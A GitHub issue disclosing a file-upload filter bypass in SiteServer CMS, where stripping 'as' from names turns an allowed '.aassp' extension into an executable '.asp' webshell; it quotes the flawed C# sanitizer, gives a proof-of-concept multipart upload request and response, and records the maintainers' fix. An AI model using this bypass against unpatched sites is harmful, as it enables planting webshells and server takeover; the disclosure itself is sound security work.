Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a vulnerability that the attacker can uploads a file bypassed the filtering rule to getshell. #1858

Closed
diy0829 opened this issue Apr 12, 2019 · 4 comments
Labels

Comments

@diy0829
Copy link

diy0829 commented Apr 12, 2019

After the administrator logged in and added a new permitted extension of file such as "aassp".

image

The administrator can upload a malicious file which extension is "aassp".
After the file was filtered by the rule, the file extension will be changed to "*.asp". Then the file will run as a webshell.

https://github.com/siteserver/cms/blob/dev/net452/SiteServer.CMS/Core/PathUtility.cs

public static string GetUploadFileName(SiteInfo siteInfo, string filePath, bool isUploadChangeFileName)
        {
            var retVal = isUploadChangeFileName
                ? $"{StringUtils.GetShortGuid(false)}{PathUtils.GetExtension(filePath)}"
                : PathUtils.GetFileName(filePath);

            retVal = StringUtils.ReplaceIgnoreCase(retVal, "as", string.Empty);
            retVal = StringUtils.ReplaceIgnoreCase(retVal, ";", string.Empty);
            return retVal;
        }

        public static string GetUploadSpecialName(SiteInfo siteInfo, string filePath, bool isUploadChangeFileName)
        {
            var retVal = isUploadChangeFileName ? $"{StringUtils.GetShortGuid(false)}{PathUtils.GetExtension(filePath)}" : PathUtils.GetFileName(filePath);

            retVal = StringUtils.ReplaceIgnoreCase(retVal, "as", string.Empty);
            retVal = StringUtils.ReplaceIgnoreCase(retVal, ";", string.Empty);
            return retVal;
        }

The filtering rule:

retVal = StringUtils.ReplaceIgnoreCase(retVal, "as", string.Empty);

The rule is so simple that replaces "as" .

And the suggestion is:

After replacied, add a judgement to enhance the filter that
if "as" in extension of file then reject uploading.

POC:

POST /siteserver/cms/modaluploadfile.aspx?PublishmentSystemID=1&uploadType=File&TextBoxClientID=FileUrl HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------1604917268667
Content-Length: 951

-----------------------------1604917268667
Content-Disposition: form-data; name="__EVENTTARGET"

btnSubmit
-----------------------------1604917268667
Content-Disposition: form-data; name="__EVENTARGUMENT"


-----------------------------1604917268667
Content-Disposition: form-data; name="__VIEWSTATE"

/wEPDwUJNjg4OTYyMzU3D2QWAgITD2QWAgIJDxBkDxYCZgIBFgIQBRvph4fnlKjns7vnu5/nlJ/miJDmlofku7blkI0FBFRydWVnEAUV6YeH55So5Y6f5pyJ5paH5Lu25ZCNBQVGYWxzZWdkZGRQ+LsLscytW1JgCPV76ln/lcczLM1kE1yuOcQDnYTmhQ==
-----------------------------1604917268667
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"

EAC6D450
-----------------------------1604917268667
Content-Disposition: form-data; name="hifUpload"; filename="1.aassp"
Content-Type: application/octet-stream

test

-----------------------------1604917268667
Content-Disposition: form-data; name="rblIsFileUploadChangeFileName"

True
-----------------------------1604917268667--

A part of the response :

    
if (parent.document.getElementById('FileUrl') != null)
{
    parent.document.getElementById('FileUrl').value = '@/upload/files/2019/4/131348846.asp';
}
if (window.parent.closeWindow) window.parent.closeWindow();if (window.parent.layer) window.parent.layer.closeAll();
  </script>```


@starlying
Copy link
Contributor

The details of the bug are very clear. We will fix it in the next version. Thanks for your help

@NicoleG25
Copy link

@starlying was this issue ever addressed? and if so could you point me to the fix ?
Thanks !

@starlying
Copy link
Contributor

this issue is addressed, update to latest version will fix it

@NicoleG25
Copy link

@starlying in which commit was the issue fixed?

Thanks in advance :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

3 participants